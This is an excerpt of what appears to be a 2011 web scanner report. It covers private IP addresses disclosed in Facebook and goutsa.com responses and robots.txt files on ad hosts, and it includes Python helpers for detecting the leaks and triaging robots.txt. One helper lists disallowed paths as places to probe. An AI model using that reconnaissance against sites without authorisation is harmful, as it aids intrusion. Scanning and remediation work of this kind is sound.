The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.220.55

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.220.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:45:33 GMT
Content-Length: 25903

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.224.53

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.224.53
X-Cnection: close
Date: Sun, 04 Sep 2011 00:43:32 GMT
Content-Length: 25903

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.23. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.62.205.50

Request

GET /plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffeb1f384%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=400 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.205.50
X-Cnection: close
Date: Sun, 04 Sep 2011 01:08:37 GMT
Content-Length: 26215

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.63.34.64

Request

GET /plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df281409b84%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=225 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.34.64
X-Cnection: close
Date: Sun, 04 Sep 2011 01:10:17 GMT
Content-Length: 26216

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

25.25. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.63.24.54

Request

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.54
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:33 GMT
Content-Length: 8517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

25.26. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.199.40

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.199.40
Connection: close
Date: Sun, 04 Sep 2011 01:25:57 GMT
Content-Length: 4255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

25.27. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.63.15.49

Request

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.49
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 21035

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...

25.28. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.184.60

Request

GET /plugins/recommendations.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.184.60
Connection: close
Date: Sun, 04 Sep 2011 01:25:58 GMT
Content-Length: 18354

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...

25.29. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.200.54

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.200.54
Connection: close
Date: Sun, 04 Sep 2011 01:25:59 GMT
Content-Length: 0


25.30. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header): 10.64.196.51

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.51
Connection: close
Date: Sun, 04 Sep 2011 01:25:59 GMT
Content-Length: 0


25.31. http://www.goutsa.com/ViewArticle.dbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /ViewArticle.dbml

Issue detail

The following RFC 1918 IP address was disclosed in the response (in an HTML comment in the body that also names the backend host): 10.3.8.159

Request

GET /ViewArticle.dbml HTTP/1.1
Host: www.goutsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:11 GMT
Server: Apache
P3P: policyref="http://www.goutsa.com/TermsAndConditions.dbml?DB_OEM_ID=13100", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 68639
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma
...[SNIP]...
<!-- The server is oma-www43.xosn.com/10.3.8.159-->
...[SNIP]...
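The X-FB-Server headers and the goutsa.com HTML comment above are the strings the scanner matched. As an added example that is not part of the original report and is not the scanner's own detection logic, the Python below applies the same test to a raw HTTP response: it tokenises dotted quads in header values and body lines, validates each one with the ipaddress module, and keeps only addresses inside the three RFC 1918 ranges, so a version string such as 2.0.1.7 or a public address does not trigger. The two sample responses are constructed from findings 25.16 and 25.31; the version-string and 203.0.113.9 decoy lines are added here and are not from the page.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# The three RFC 1918 ranges. ipaddress.is_private is wider (loopback, link-local,
# 0.0.0.0/8, ...), so the membership test is done against these networks explicitly.
RFC1918_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Dotted-quad candidates. The look-arounds stop a match starting or ending inside a
# longer dotted number; ipaddress.ip_address() rejects out-of-range octets afterwards.
_IPV4_CANDIDATE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed sample responses, modelled on findings 25.16 and 25.31 above.
# The "Build 2.0.1.7 served from 203.0.113.9" line is a decoy added for this example.
SAMPLE_RESPONSES: Dict[str, str] = {
    "www.facebook.com /extern/login_status.php": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "X-FB-Server: 10.64.225.42\r\n"
        "Connection: close\r\n"
        "\r\n"
        "Invalid Application ID"
    ),
    "www.goutsa.com /ViewArticle.dbml": (
        "HTTP/1.1 200 OK\r\n"
        "Server: Apache\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><body>\n"
        "<!-- The server is oma-www43.xosn.com/10.3.8.159-->\n"
        "<p>Build 2.0.1.7 served from 203.0.113.9</p>\n"
        "</body></html>"
    ),
}


def is_rfc1918(token: str) -> bool:
    """True only for a syntactically valid IPv4 address in 10/8, 172.16/12 or 192.168/16."""
    try:
        addr = ipaddress.ip_address(token)
    except ValueError:
        return False
    return addr.version == 4 and any(addr in net for net in RFC1918_NETS)


def find_private_ips(raw_response: str) -> List[Tuple[str, str, str]]:
    """Scan one raw HTTP response (CRLF framed). Returns (location, context, ip) tuples:
    location is 'header' with the header name as context, or 'body' with the line."""
    head, _, body = raw_response.partition("\r\n\r\n")
    hits: List[Tuple[str, str, str]] = []
    for line in head.split("\r\n")[1:]:          # [1:] skips the status line
        name, _, value = line.partition(":")
        for cand in _IPV4_CANDIDATE.findall(value):
            if is_rfc1918(cand):
                hits.append(("header", name.strip(), cand))
    for line in body.splitlines():
        for cand in _IPV4_CANDIDATE.findall(line):
            if is_rfc1918(cand):
                hits.append(("body", line.strip(), cand))
    return hits


def scan_all(responses: Dict[str, str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Run find_private_ips over a set of captured responses, keeping only those with hits."""
    report: Dict[str, List[Tuple[str, str, str]]] = {}
    for key, raw in responses.items():
        hits = find_private_ips(raw)
        if hits:
            report[key] = hits
    return report


if __name__ == "__main__":
    for key, hits in scan_all(SAMPLE_RESPONSES).items():
        for location, context, ip in hits:
            print(f"{key}: {ip} disclosed in {location} ({context})")
```

The header and body passes are kept separate because the remediation differs: a header such as X-FB-Server is usually added by a load balancer or debug middleware and can be stripped at the edge, while an address in an HTML comment comes from the application template itself.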

26. Robots.txt file
There are 137 instances of this issue:

Issue background

The robots.txt file gives instructions to web robots, such as search engine crawlers, about which locations within the site they are allowed or not allowed to crawl and index.

The presence of a robots.txt file does not in itself constitute a security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. Compliance with it is entirely voluntary on the client's side, so you should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file, and will treat a Disallow entry as an invitation to look. Do not rely on robots.txt to provide any kind of protection over unauthorised access; enforce access control on the server for every location the file names.
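The following Python is an added example that is not part of the original report and not the scanner's own check. It turns a robots.txt body into what the paragraphs above describe: the paths the operator wanted kept out of the index (the ones worth probing next), and the user-agent names that are exempted while everyone else is blocked, which is a statement of intent a client is free to ignore. The sample bodies are copied from the ad.turn.com, ad.doubleclick.net and b.scorecardresearch.com responses recorded in this section; the handling of wildcard and anchored entries in candidate_paths goes beyond those samples.

```python
from typing import Dict, List

# Constructed samples, copied from the robots.txt responses recorded in this section.
ROBOTS_SAMPLES: Dict[str, str] = {
    "ad.turn.com": "User-agent: *\nDisallow: /app\nDisallow: /server\n",
    "ad.doubleclick.net": (
        "User-Agent: AdsBot-Google\nDisallow:\n\n"
        "User-Agent: MSNPTC\nDisallow:\n\n"
        "User-agent: *\nDisallow: /\n"
    ),
    "b.scorecardresearch.com": "User-agent: *\nDisallow: /\n",
}

Rules = Dict[str, List[str]]          # {"allow": [...], "disallow": [...]}


def parse_robots(text: str) -> Dict[str, Rules]:
    """Group Allow/Disallow lines by user-agent.

    Field names are matched case-insensitively ('User-Agent' and 'User-agent' both
    occur in the samples), '#' starts a comment, and consecutive User-agent lines
    share the rule block that follows them. A blank line, or a User-agent line that
    comes after a rule line, starts a new group."""
    groups: Dict[str, Rules] = {}
    agents: List[str] = []
    collecting_agents = True
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            agents, collecting_agents = [], True
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not collecting_agents:
                agents, collecting_agents = [], True
            agents.append(value)
            groups.setdefault(value, {"allow": [], "disallow": []})
        elif field in ("allow", "disallow") and agents:
            collecting_agents = False
            for agent in agents:
                groups[agent][field].append(value)
    return groups


def candidate_paths(groups: Dict[str, Rules]) -> List[str]:
    """Locations an attacker would probe next: every Disallow entry that names
    something narrower than the whole site. An empty Disallow permits everything
    and a bare '/' blocks everything, so neither reveals a path."""
    paths = set()
    for rules in groups.values():
        for entry in rules["disallow"]:
            if entry and entry != "/":
                paths.add(entry.rstrip("*$"))   # keep the literal prefix of a wildcard/anchored rule
    return sorted(paths)


def exempt_agents(groups: Dict[str, Rules]) -> List[str]:
    """User-agents given an empty Disallow while '*' is blocked from '/'.
    Nothing stops a crawler from sending one of these names, which is why the
    file records operator intent rather than enforcing access control."""
    star = groups.get("*", {"allow": [], "disallow": []})["disallow"]
    if "/" not in star:
        return []
    return sorted(
        agent for agent, rules in groups.items()
        if agent != "*" and rules["disallow"] and not any(rules["disallow"])
    )


def triage(samples: Dict[str, str]) -> Dict[str, Dict[str, List[str]]]:
    """Summarise each host's robots.txt as probe paths plus exempted agent names."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for host, text in samples.items():
        groups = parse_robots(text)
        report[host] = {"paths": candidate_paths(groups), "exempt": exempt_agents(groups)}
    return report


if __name__ == "__main__":
    for host, summary in triage(ROBOTS_SAMPLES).items():
        print(f"{host}: probe {summary['paths'] or 'nothing'}; "
              f"exempt agents {summary['exempt'] or 'none'}")
```

Of the 137 instances in this section, most are the blanket "Disallow: /" seen on the ad-serving hosts, which names nothing and so gives an attacker nothing; the ad.turn.com file, which singles out /app and /server, is the kind of entry the background text warns about, and those two prefixes are exactly what triage() returns for it.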


26.1. http://206537.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://206537.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 206537.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Thu, 04 Aug 2011 19:57:46 GMT
Accept-Ranges: bytes
ETag: "936ba6c7e052cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 04 Sep 2011 01:21:04 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.2. http://243973.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://243973.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 243973.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Thu, 04 Aug 2011 19:57:46 GMT
Accept-Ranges: bytes
ETag: "936ba6c7e052cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 04 Sep 2011 01:21:04 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.3. http://943042.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://943042.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 943042.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Thu, 04 Aug 2011 19:57:46 GMT
Accept-Ranges: bytes
ETag: "936ba6c7e052cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 04 Sep 2011 01:21:06 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.4. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.5. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:08 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


26.6. http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.usatoday.comOX3622/B5770010.6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.7. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 01:05:49 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.8. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:42:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:42:18 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

26.9. http://ads.undertone.com/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "42680a8-1a-4abaaf7619480"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:45:04 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
